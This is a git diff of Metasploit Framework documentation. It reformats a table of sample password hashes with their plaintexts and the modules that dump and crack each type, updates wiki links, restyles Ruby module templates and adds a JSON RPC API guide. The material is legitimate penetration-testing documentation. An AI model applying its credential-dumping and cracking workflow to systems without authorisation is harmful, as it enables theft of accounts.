-| MSSQL | mssql_foo | `0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254` | foo | mssql | auxiliary/scanner/mssql/mssql_hashdump | auxiliary/analyze/jtr_mssql_fast |
-| MSSQL (2012) | mssql12_Password1! | `0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16` | Password! | mssql12 | auxiliary/scanner/mssql/mssql_hashdump | auxiliary/analyze/jtr_mssql_fast |
-| MySQL | mysql_probe | `445ff82636a7ba59` | probe | mysql | auxiliary/scanner/mysql/mysql_hashdump | auxiliary/analyze/jtr_mysql_fast |
-| MySQL SHA1 | mysql-sha1_tere | `*5AD8F88516BD021DD43F171E2C785C69F8E54ADB` | tere | mysql-sha1 | auxiliary/scanner/mysql/mysql_hashdump | auxiliary/analyze/jtr_mysql_fast |
-| Oracle | simon | `4F8BC1809CB2AF77` | A | des,oracle | auxiliary/scanner/oracle/oracle_hashdump | auxiliary/analyze/jtr_oracle_fast |
-| Oracle | SYSTEM | `9EEDFA0AD26C6D52` | THALES | des,oracle | auxiliary/scanner/oracle/oracle_hashdump | auxiliary/analyze/jtr_oracle_fast |
-| Oracle 11    | DEMO  | `S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C` | epsilon | raw-sha1,oracle | auxiliary/scanner/oracle/oracle_hashdump | auxiliary/analyze/jtr_oracle_fast |
-| Oracle 11 | oracle11_epsilon | `S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C` | epsilon | raw-sha1,oracle | modules/auxiliary/scanner/oracle/oracle_hashdump | auxiliary/analyze/jtr_oracle_fast |
-| Oracle 12 | oracle12_epsilon | `H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B` | epsilon | pbkdf2,oracle12c | auxiliary/scanner/oracle/oracle_hashdump | auxiliary/analyze/jtr_oracle_fast |
-| Postgres | example | `md5be86a79bf2043622d58d5453c47d4860` | password | raw-md5,postgres | auxiliary/scanner/postgres/postgres_hashdump | auxiliary/analyze/jtr_postgres_fast |
-| HMAC-MD5 | hmac_password | `<3263520797@127.0.0.1>#3f089332842764e71f8400ede97a84c9` | password | hmac-md5 | auxiliary/server/capture/smtp | None |
-| SHA512($p.$s)/dynamic_82/vmware ldap | vmware_ldap | `$dynamic_82$a702505b8a67b45065a6a7ff81ec6685f08d06568e478e1a7695484a934b19a28b94f58595d4de68b27771362bc2b52444a0ed03e980e11ad5e5ffa6daa9e7e1$HEX$171ada255464a439569352c60258e7c6` | TestPass123# | dynamic_82 |  | None |
+| Hash Type                            | Username           | Hash                                                                                                                                                                                                                                                                   | Password     | jtr format       | Modules which dump this info                     | Modules which crack this                                  |
+| ------------------------------------ | ------------------ | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------ | ---------------- | ------------------------------------------------ | --------------------------------------------------------- |
+| -----------                          | ----------         | ------                                                                                                                                                                                                                                                                 | ----------   | ------------     | ------------------------------                   | -------------------------                                 |
+| DES                                  | des_password       | `rEK1ecacw.7.c`                                                                                                                                                                                                                                                        | password     | des              |                                                  | auxiliary/analyze/crack_aix auxiliary/analyze/crack_linux |
+| MD5                                  | md5_password       | `$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/`                                                                                                                                                                                                                                   | password     | md5              |                                                  | auxiliary/analyze/crack_linux                             |
+| BSDi                                 | bsdi_password      | `_J9..K0AyUubDrfOgO4s`                                                                                                                                                                                                                                                 | password     | bsdi             |                                                  | auxiliary/analyze/crack_linux                             |
+| SHA256                               | sha256_password    | `$5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5`                                                                                                                                                                                                              | password     | sha256,crypt     |                                                  | auxiliary/analyze/crack_linux                             |
+| SHA512                               | sha512_password    | `$6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1`                                                                                                                                                                   | password     | sha512,crypt     |                                                  | auxiliary/analyze/crack_linux                             |
+| Blowfish                             | blowfish_password  | `$2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe`                                                                                                                                                                                                         | password     | bf               |                                                  | auxiliary/analyze/crack_linux                             |
+| Lanman                               | lm_password        | `E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C`                                                                                                                                                                                                    | password     | lm               |                                                  | auxiliary/analyze/crack_windows                           |
+| NTLM                                 | nt_password        | `AAD3B435B51404EEAAD3B435B51404EE:8846F7EAEE8FB117AD06BDD830B7586C`                                                                                                                                                                                                    | password     | nt               |                                                  | auxiliary/analyze/crack_windows                           |
+| NetNTLMv1                            | u4-netntlm         | `u4-netntlm::kNS:338d08f8e26de93300000000000000000000000000000000:9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41:cb8086049ec4736c`                                                                                                                                   | hashcat      | netntlm          |                                                  | auxiliary/analyze/crack_windows                           |
+| NetNTLMv2                            | admin              | `admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030`                                                                                       | hashcat      | netntlmv2        |                                                  | auxiliary/analyze/crack_windows                           |
+| MSSQL (2005)                         | mssql05_toto       | `0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908`                                                                                                                                                                                                               | toto         | mssql05          | auxiliary/scanner/mssql/mssql_hashdump           | auxiliary/analyze/crack_databases                         |
+| MSSQL                                | mssql_foo          | `0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254`                                                                                                                                                                       | foo          | mssql            | auxiliary/scanner/mssql/mssql_hashdump           | auxiliary/analyze/crack_databases                         |
+| MSSQL (2012)                         | mssql12_Password1! | `0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16`                                                                                                                       | Password!    | mssql12          | auxiliary/scanner/mssql/mssql_hashdump           | auxiliary/analyze/crack_databases                         |
+| MySQL                                | mysql_probe        | `445ff82636a7ba59`                                                                                                                                                                                                                                                     | probe        | mysql            | auxiliary/scanner/mysql/mysql_hashdump           | auxiliary/analyze/crack_databases                         |
+| MySQL SHA1                           | mysql-sha1_tere    | `*5AD8F88516BD021DD43F171E2C785C69F8E54ADB`                                                                                                                                                                                                                            | tere         | mysql-sha1       | auxiliary/scanner/mysql/mysql_hashdump           | auxiliary/analyze/crack_databases                         |
+| Oracle                               | simon              | `4F8BC1809CB2AF77`                                                                                                                                                                                                                                                     | A            | des,oracle       | auxiliary/scanner/oracle/oracle_hashdump         | auxiliary/analyze/crack_databases                         |
+| Oracle                               | SYSTEM             | `9EEDFA0AD26C6D52`                                                                                                                                                                                                                                                     | THALES       | des,oracle       | auxiliary/scanner/oracle/oracle_hashdump         | auxiliary/analyze/crack_databases                         |
+| Oracle 11                            | DEMO               | `S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C` | epsilon      | raw-sha1,oracle  | auxiliary/scanner/oracle/oracle_hashdump         | auxiliary/analyze/crack_databases                         |
+| Oracle 11                            | oracle11_epsilon   | `S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C` | epsilon      | raw-sha1,oracle  | modules/auxiliary/scanner/oracle/oracle_hashdump | auxiliary/analyze/crack_databases                         |
+| Oracle 12                            | oracle12_epsilon   | `H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B`                                                                | epsilon      | pbkdf2,oracle12c | auxiliary/scanner/oracle/oracle_hashdump         | auxiliary/analyze/crack_databases                         |
+| Postgres                             | example            | `md5be86a79bf2043622d58d5453c47d4860`                                                                                                                                                                                                                                  | password     | raw-md5,postgres | auxiliary/scanner/postgres/postgres_hashdump     | auxiliary/analyze/crack_databases                         |
+| HMAC-MD5                             | hmac_password      | `<3263520797@127.0.0.1>#3f089332842764e71f8400ede97a84c9`                                                                                                                                                                                                              | password     | hmac-md5         | auxiliary/server/capture/smtp                    | None                                                      |
+| SHA512($p.$s)/dynamic_82/vmware ldap | vmware_ldap        | `$dynamic_82$a702505b8a67b45065a6a7ff81ec6685f08d06568e478e1a7695484a934b19a28b94f58595d4de68b27771362bc2b52444a0ed03e980e11ad5e5ffa6daa9e7e1$HEX$171ada255464a439569352c60258e7c6`                                                                                    | TestPass123# | dynamic_82       |                                                  | None                                                      |  |  |

 # Adding a New Hash

@@ -1,8 +1,8 @@
-Welcome to Metasploit-land. Are you a Metasploit user who wants to get started or get better at hacking stuff (that you have permission to hack)? The quickest way to get started is to [download the Metasploit nightly installers](https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers). This will give you access to both the free, open-source Metasploit Framework and a free trial of Metasploit Pro.
+Welcome to Metasploit-land. Are you a Metasploit user who wants to get started or get better at hacking stuff (that you have permission to hack)? The quickest way to get started is to [[download the Metasploit nightly installers|./Nightly-Installers.md]]. This will give you access to both the free, open-source Metasploit Framework and a free trial of Metasploit Pro.

 If you're using [Kali Linux](https://kali.org/), Metasploit is already pre-installed. See the [Kali documentation](https://kali.org/docs/tools/starting-metasploit-framework-in-kali/) for how to get started using Metasploit in Kali Linux.

-Are you anxious to get your [Metasploit Development Environment](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment) set up so you can start [[Landing Pull Requests]] and contributing excellent exploit code? If so, you're in the right place. If you're an exploit developer, you will want to review our [[Guidelines for Accepting Modules and Enhancements]] to find out what we expect when we see pull requests for new Metasploit modules. No idea what you should start working on? Check out the guidelines for [[contributing to Metasploit]], and dive into [[Setting Up a Metasploit Development Environment]].
+Are you anxious to get your [[Metasploit Development Environment|./dev/Setting-Up-a-Metasploit-Development-Environment.md]] set up so you can start [[Landing Pull Requests]] and contributing excellent exploit code? If so, you're in the right place. If you're an exploit developer, you will want to review our [[Guidelines for Accepting Modules and Enhancements]] to find out what we expect when we see pull requests for new Metasploit modules. No idea what you should start working on? Check out the guidelines for [[contributing to Metasploit]], and dive into [[Setting Up a Metasploit Development Environment]].

 # Getting Started #

@@ -7,7 +7,7 @@ An updated list of the application timeline can be found at https://developers.g

 ## Important Dates

- GSoC Applications Open: April 4th at 1800 UTC 
+- GSoC Applications Open: April 4th at 1800 UTC
 - GSoC Applications Close: April 19th at 1800 UTC for 2022 GSoC applications. **No late submissions will be accepted, period.**
 - Accepted applications announced: May 20th at 1800 UTC
 - Programming Starts: June 13th.
@@ -19,14 +19,14 @@ An updated list of the application timeline can be found at https://developers.g
 You can find the current list of GSoC ideas at [[GSoC-2022-Project-Ideas]]. Please see the note at the bottom of this page if you are interested in submitting your own idea, as this will require approval.

 # Getting started
-Students interesting in GSoC, can start by reading Google's official guides.  
+Students interesting in GSoC, can start by reading Google's official guides.
 <https://developers.google.com/open-source/gsoc/help/student-advice>

 Review all of the [student guide](https://google.github.io/gsocguides/student/) and carefully read the [proposal writing section](https://google.github.io/gsocguides/student/writing-a-proposal.html).

 A listed `idea` is a seed for GSoC students to expand on and propose how to design and implement a solution.  You can start by investigating the code base and how existing users interaction with `msfconsole` functionality. Think through scenarios on how a user might want to interact with the proposed idea.

-A place to get started with contributing to Metasploit is [here](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md) and expanded on [here](https://github.com/rapid7/metasploit-framework/wiki/Contributing-to-Metasploit#framework-bugs-and-features).
+A place to get started with contributing to Metasploit is [here](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md) and expanded on [[here|./Contributing-to-Metasploit.md]].

 GSoC mentors tend to look for those items that have a chance of making development and usage easier or improving the overall performance of a certain area, however by starting with understanding the most common contribution pattern you can get familiar with the codebase and also the mindset of users. This will help you in creating a proposal with the end user in mind.

@@ -50,14 +50,14 @@ A brief description of what you would like to work on. See [[GSoC-2022-Project-I

 ## Skillz

-What programming languages are you familiar with, in order of proficiency? Most of Metasploit is written in Ruby; for any project you will most likely need at least a passing knowledge of it. If you want to work on Meterpreter or Mettle, C will be necessary as well. 
+What programming languages are you familiar with, in order of proficiency? Most of Metasploit is written in Ruby; for any project you will most likely need at least a passing knowledge of it. If you want to work on Meterpreter or Mettle, C will be necessary as well.

 What other projects have you worked on before?


 ## Your project

-Fill in the details. What exactly do you want to accomplish? 
+Fill in the details. What exactly do you want to accomplish?

 # Past Submissions
 If you are interested in looking at past accepted submissions and projects, you can find them at https://summerofcode.withgoogle.com/archive, and clicking on any year from 2017 onwards (with the exception of 2019 as Metasploit did not participate this year). Then click on the `Security` tag, and search for `Metasploit`. Scroll down to the bottom and you will see past successful applications and the associated code for each successful submission. Submissions from 2020 onwards also include copies of the proposal that was sent in by the accepted contributor.
@@ -1,16 +1,16 @@
-The [HttpClient mixin](https://rapid7.github.io/metasploit-framework/api/Msf/Exploit/Remote/HttpClient) can be included with an exploit module in order to facilitate easier HTTP communications with a target machine.
+The [HttpClient mixin](https://docs.metasploit.com/api/Msf/Exploit/Remote/HttpClient) can be included with an exploit module in order to facilitate easier HTTP communications with a target machine.

 ## There are mainly two common methods you will see:

-* **[send\_request\_raw](https://rapid7.github.io/metasploit-framework/api/Msf/Exploit/Remote/HttpClient.html#send_request_raw-instance_method)** - You use this to send a raw HTTP request. Usually, you will want this method if you need something that violates the specification; in most other cases, you should prefer `send_request_cgi`.  If you wish to learn about how this method works, look at the documentation for [`Rex::Proto::Http::Client#request_raw`](https://rapid7.github.io/metasploit-framework/api/Rex/Proto/Http/Client.html#request_raw-instance_method).
- 
+* **[send\_request\_raw](https://docs.metasploit.com/api/Msf/Exploit/Remote/HttpClient.html#send_request_raw-instance_method)** - You use this to send a raw HTTP request. Usually, you will want this method if you need something that violates the specification; in most other cases, you should prefer `send_request_cgi`.  If you wish to learn about how this method works, look at the documentation for [`Rex::Proto::Http::Client#request_raw`](https://docs.metasploit.com/api/Rex/Proto/Http/Client.html#request_raw-instance_method).
+
 Here's a basic example of how to use `send_request_raw`:

 ```ruby
 	send_request_raw({'uri'=>'/index.php'})
 ```

-* **[send\_request\_cgi](https://rapid7.github.io/metasploit-framework/api/Msf/Exploit/Remote/HttpClient.html#send_request_cgi-instance_method)** - You use this to send a more CGI-compatible HTTP request. If your request contains a query string (or POST data), then you should use this.  If you wish to learn about how this method works, check out [`Rex::Proto::Http::Client#request_cgi`](https://rapid7.github.io/metasploit-framework/api/Rex/Proto/Http/Client.html#request_cgi-instance_method).
+* **[send\_request\_cgi](https://docs.metasploit.com/api/Msf/Exploit/Remote/HttpClient.html#send_request_cgi-instance_method)** - You use this to send a more CGI-compatible HTTP request. If your request contains a query string (or POST data), then you should use this.  If you wish to learn about how this method works, check out [`Rex::Proto::Http::Client#request_cgi`](https://docs.metasploit.com/api/Rex/Proto/Http/Client.html#request_cgi-instance_method).



@@ -31,7 +31,7 @@ send_request_cgi({

 ## Cookies & CookieJars

-Part of send\_request\_cgi functionality is the ability to collect, edit, and send cookies via the HttpClient's  `cookie_jar` variable, an instance of the [HttpCookieJar](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/remote/http/http_cookie_jar.rb) class. 
+Part of send\_request\_cgi functionality is the ability to collect, edit, and send cookies via the HttpClient's  `cookie_jar` variable, an instance of the [HttpCookieJar](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/remote/http/http_cookie_jar.rb) class.

 A HttpCookieJar is a collection of [HttpCookie](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/remote/http/http_cookie.rb). The Jar can be populated manually with it's `add` method, or automatically via the `keep_cookies` option that can be passed to [send\_request\_cgi](https://github.com/rapid7/metasploit-framework/blob/92d981fff2b4a40324969fd1d1744219589b5fa3/lib/msf/core/exploit/remote/http_client.rb#L385).

@@ -59,7 +59,7 @@ res = @http_client.send_request_cgi({
  }
 })
 ```
-The cookies returned by the server with a successful login need to be attached to all future requests, so `'keep_cookies' => true,` is used to add all returned cookies to the HttpClient CookieJar and attach them to all subsequent requests. 
+The cookies returned by the server with a successful login need to be attached to all future requests, so `'keep_cookies' => true,` is used to add all returned cookies to the HttpClient CookieJar and attach them to all subsequent requests.

 ### `cookie` option
 Shown below is the request used to login to a gitlab account in the [artical\_proxy\_auth\_bypass\_service\_cmds\_peform\_command\_injection module](https://github.com/rapid7/metasploit-framework/blob/92d981fff2b4a40324969fd1d1744219589b5fa3/modules/exploits/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.rb#L115)
@@ -136,7 +136,7 @@ register_options(
 )
 ```

-**2** - Load your TARGETURI with [`target_uri`](https://rapid7.github.io/metasploit-framework/api/Msf/Exploit/Remote/HttpClient.html#target_uri-instance_method), that way the URI input validation will kick in, and then you get a real `URI` object:
+**2** - Load your TARGETURI with [`target_uri`](https://docs.metasploit.com/api/Msf/Exploit/Remote/HttpClient.html#target_uri-instance_method), that way the URI input validation will kick in, and then you get a real `URI` object:

 In this example, we'll just load the path:

@@ -144,7 +144,7 @@ In this example, we'll just load the path:
 uri = target_uri.path
 ```

-**3** - When you want to join another URI, always use [`normalize_uri`](https://rapid7.github.io/metasploit-framework/api/Msf/Exploit/Remote/HttpClient.html#normalize_uri-instance_method):
+**3** - When you want to join another URI, always use [`normalize_uri`](https://docs.metasploit.com/api/Msf/Exploit/Remote/HttpClient.html#normalize_uri-instance_method):

 Example:

@@ -164,8 +164,6 @@ Please note: The `normalize_uri` method will always follow these rules:
 ## Full Example

 ```ruby
-require 'msf/core'
-
 class MetasploitModule < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient
@@ -38,7 +38,7 @@ register_options(

 ### Fixed filename

-Occasionally, you might not want your user to change the filename at all. A lazy trick to do that is by modifying the ```FILENAME``` datastore option at runtime, but this is very much not recommended. In fact, if you do this, you will not pass [msftidy](https://github.com/rapid7/metasploit-framework/wiki/Guidelines-for-Accepting-Modules-and-Enhancements#module-additions). Instead, here's how it's done properly:
+Occasionally, you might not want your user to change the filename at all. A lazy trick to do that is by modifying the ```FILENAME``` datastore option at runtime, but this is very much not recommended. In fact, if you do this, you will not pass [[msftidy|./Guidelines-for-Accepting-Modules-and-Enhancements.md]]. Instead, here's how it's done properly:

 1 - Deregister the ```FILENAME``` option

@@ -35,7 +35,7 @@ DEPRECATION_REPLACEMENT = 'exploit/linux/http/dlink_upnp_exec_noauth'

 When the user loads that module, they should see a warning like this:

-```
+```msf
 msf > use exploit/windows/misc/test 

 [!] ************************************************************************
@@ -48,8 +48,6 @@ msf > use exploit/windows/misc/test
 ## Code example

 ```ruby
-require 'msf/core'
-
 class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

@@ -58,23 +56,26 @@ class MetasploitModule < Msf::Exploit::Remote
  deprecated(Date.new(2014, 9, 21), 'exploit/linux/http/dlink_upnp_exec_noauth')

  def initialize(info = {})
-    super(update_info(info,
-      'Name'        => 'Msf::Module::Deprecated Example',
-      'Description' => %q{
-        This shows how to use Msf::Module::Deprecated.
-      },
-      'Author'      => [ 'sinn3r' ],
-      'License'     => MSF_LICENSE,
-      'References'  => [ [ 'URL', 'http://metasploit.com' ] ],
-      'DisclosureDate' => 'Apr 01 2014',
-      'Targets'        => [ [ 'Automatic', { } ] ],
-      'DefaultTarget'  => 0
-    ))
+    super(
+      update_info(
+        info,
+        'Name' => 'Msf::Module::Deprecated Example',
+        'Description' => %q{
+          This shows how to use Msf::Module::Deprecated.
+        },
+        'Author' => [ 'sinn3r' ],
+        'License' => MSF_LICENSE,
+        'References' => [ [ 'URL', 'http://metasploit.com' ] ],
+        'DisclosureDate' => '2014-04-01',
+        'Targets' => [ [ 'Automatic', {} ] ],
+        'DefaultTarget' => 0
+      )
+    )
  end

  def exploit
-    print_debug("Code example")
+    print_debug('Code example')
  end

 end
-```
+```
@@ -2,7 +2,7 @@ This is an update of the original blog post about how to get Oracle support work

 Due to licensing issues, we cannot ship Oracle's proprietary client access libraries by default. As a result, you may see this error when running a Metasploit module:

-```
+```msf
 msf auxiliary(oracle_login) > run

 [-] Failed to load the OCI library: cannot load such file -- oci8
@@ -11,7 +11,7 @@ msf auxiliary(oracle_login) > run
 msf auxiliary(oracle_login) > run
 ```
 or
-```
+```msf
 msf5 auxiliary(scanner/oracle/oracle_hashdump) > run

 [-] Failed to load the OCI library: cannot load such file -- oci8
@@ -159,4 +159,4 @@ install oci8.rb /opt/metasploit/ruby/lib/ruby/site_ruby/2.5.0/
 [...]
 <--- ext
 root@kali:~/ruby-oci8-ruby-oci8-2.2.7#
-```
+```
@@ -2,4 +2,4 @@

 I tricked you. We don't let anybody write Meterpreter scripts anymore, therefore we will no longer teach you how.

-[You should try writing post modules instead](https://github.com/rapid7/metasploit-framework/wiki/How-to-get-started-with-writing-a-post-module).
+[[You should try writing post modules instead|./How-to-get-started-with-writing-a-post-module.md]].
@@ -32,7 +32,7 @@ So you know how in Lord of the Rings, people are totally obsessed with the One R

 You can use the ```session``` method to access the session object, or its alias ```client```. The best way to interact with one is via irb, here's an example of how:

-```
+```msf
 msf exploit(handler) > run

 [*] Started reverse handler on 192.168.1.64:4444 
@@ -53,19 +53,20 @@ Here's the most basic example of an auxiliary module. We'll explain a bit more a
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

-require 'msf/core'
-
 class MetasploitModule < Msf::Auxiliary

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Module name',
-      'Description'    => %q{
-        Say something that the user might want to know.
-      },
-      'Author'         => [ 'Name' ],
-      'License'        => MSF_LICENSE
-    ))
+    super(
+      update_info(
+        info,
+        'Name' => 'Module name',
+        'Description' => %q{
+          Say something that the user might want to know.
+        },
+        'Author' => [ 'Name' ],
+        'License' => MSF_LICENSE
+      )
+    )
  end

  def run
@@ -89,21 +90,22 @@ Because the ```Msf::Auxiliary::Scanner``` mixin is so popular, we figured you wa
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

-require 'msf/core'
-
 class MetasploitModule < Msf::Auxiliary

  include Msf::Auxiliary::Scanner

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Module name',
-      'Description'    => %q{
-        Say something that the user might want to know.
-      },
-      'Author'         => [ 'Name' ],
-      'License'        => MSF_LICENSE
-    ))
+    super(
+      update_info(
+        info,
+        'Name' => 'Module name',
+        'Description' => %q{
+          Say something that the user might want to know.
+        },
+        'Author' => [ 'Name' ],
+        'License' => MSF_LICENSE
+      )
+    )
  end

  def run_host(ip)
@@ -15,7 +15,7 @@ msf > irb
 By default, all the log errors are on level 0 - the least informative level. But of course, you can change this by setting the datastore option, like this:


-```
+```msf
 msf > setg LogLevel 3
 LogLevel => 3
 msf >
@@ -1,9 +1,9 @@
 **Note: This documentation may need to be vetted.**

 # How to send an HTTP request using Rex::Proto::Http::Client
-The Rex library (Ruby Extension Library) is the most fundamental piece of the Metasploit Framework architecture. Modules normally do not interact with Rex directly, instead they depend on the framework core and its mixins for better code sharing. If you are a Metasploit module developer, the [lib/msf/core](https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/core) directory should be more than enough for most of your needs. If you are writing a module that speaks HTTP, then the [Msf::Exploit::Remote::HttpClient](https://github.com/rapid7/metasploit-framework/wiki/How-to-Send-an-HTTP-Request-Using-HTTPClient) mixin (which is found in [lib/msf/core/exploit/http/client](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/http/client.rb)) is most likely the one you want.
+The Rex library (Ruby Extension Library) is the most fundamental piece of the Metasploit Framework architecture. Modules normally do not interact with Rex directly, instead they depend on the framework core and its mixins for better code sharing. If you are a Metasploit module developer, the [lib/msf/core](https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/core) directory should be more than enough for most of your needs. If you are writing a module that speaks HTTP, then the [[Msf::Exploit::Remote::HttpClient|./How-to-Send-an-HTTP-Request-Using-HttpClient.md]] mixin (which is found in [lib/msf/core/exploit/http/client](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/http/client.rb)) is most likely the one you want.

-However, in some scenarios, you actually can't use the HttpClient mixin. The most common is actually when writing a form-based login module using the [LoginScanner API](https://github.com/rapid7/metasploit-framework/wiki/Creating-Metasploit-Framework-LoginScanners). If you find yourself in that situation, use [Rex::Proto::Http::Client](https://github.com/rapid7/metasploit-framework/blob/master/lib/rex/proto/http/client.rb).
+However, in some scenarios, you actually can't use the HttpClient mixin. The most common is actually when writing a form-based login module using the [[LoginScanner API|./Creating-Metasploit-Framework-LoginScanners.md]]. If you find yourself in that situation, use [Rex::Proto::Http::Client](https://github.com/rapid7/metasploit-framework/blob/master/lib/rex/proto/http/client.rb).

 ## Initializing Rex::Proto::Http::Client

@@ -0,0 +1,511 @@
+The RPC API enables you to programmatically drive the Metasploit Framework and commercial products using HTTP-based remote procedure call (RPC) services. An RPC service is a collection of message types and remote methods that provide a structured way for external applications to interact with web applications. You can use the RPC interface to locally or remotely execute Metasploit commands to perform basic tasks like running modules, communicating with the database, interacting with sessions, exporting data, and generating reports.
+
+The Metasploit products are written primarily in Ruby, which is the easiest way to use the remote API. However, in addition to Ruby, any language with support for HTTPS and MessagePack, such as Python, Java, and C, can be used to take advantage of the RPC API.
+
+There are currently two implementations of Metasploit's RPC:
+
+- HTTP and messagepack - covered by a separate guide
+- HTTP and JSON - covered by this guide
+
+Note that both the messagepack and JSON RPC services provide very similar operations, and it is worth reviewing both documents.
+
+## Starting the JSON API Server
+
+The pre-requisite to running the JSON API Server is to run your Metasploit database. This can be initialized with `msfdb`.
+Note that `msfdb` will ask if you wish to run the JSON RPC web service - but it is not required for this guide which
+shows how to run the JSON service directly with [thin](https://github.com/macournoyer/thin) or [Puma](https://github.com/puma/puma): 
+
+First run the Metasploit database:
+
+```
+msfdb init
+```
+
+After configuring the database the JSON RPC service can be initialized with the [thin](https://github.com/macournoyer/thin) Ruby web server:
+
+```
+bundle exec thin --rackup msf-json-rpc.ru --address 0.0.0.0 --port 8081 --environment production --tag msf-json-rpc start
+```
+
+Or with [Puma](https://github.com/puma/puma):
+
+```
+bundle exec puma msf-json-rpc.ru --port 8081 --environment production --tag msf-json-rpc start
+```
+
+### Development
+
+If you are wanting to develop or debug the Ruby implementation of the JSON RPC service - it can be useful to run the Metasploit API synchronously in the foreground.
+This allows for console logs to appear directly in the terminal, as well as being able to interact with breakpoints via `require 'pry-byebug'; binding.pry`:
+
+It is possible to debug Msfconsole's webservice component too:
+
+```
+bundle exec ruby ./msfdb reinit
+bundle exec ruby ./msfdb --component webservice stop
+bundle exec ruby ./msfdb --component webservice --no-daemon start
+```
+
+### RPC Logging
+
+You can configure the RPC service logging with the `MSF_WS_DATA_SERVICE_LOGGER` environment variable. 
+
+The list of supported loggers is viewable with `msfconsole --help`. The list at the time of writing is:
+
+- Stdout / Stderr / StdoutWithoutTimestamps - Write logs to stdout/stderr
+- Flatfile / TimestampColorlessFlatfile  - Write logs to `~/.msf4/logs`
+
+Example usage:
+
+```
+$ MSF_WS_DATA_SERVICE_LOGGER=Stdout bundle exec thin --rackup msf-json-rpc.ru --address localhost --port 8081 --environment production --tag msf-json-rpc start
+[11/25/2020 17:34:53] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
+[11/25/2020 17:34:53] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
+[11/25/2020 17:34:53] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
+[11/25/2020 17:34:53] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
+[11/25/2020 17:34:54] [e(0)] core: Unable to load module /Users/adfoster/Documents/code/metasploit-framework/modules/auxiliary/gather/office365userenum.py - LoadError  Try running file manually to check for errors or dependency issues.
+Thin web server (v1.7.2 codename Bachmanity)
+Maximum connections set to 1024
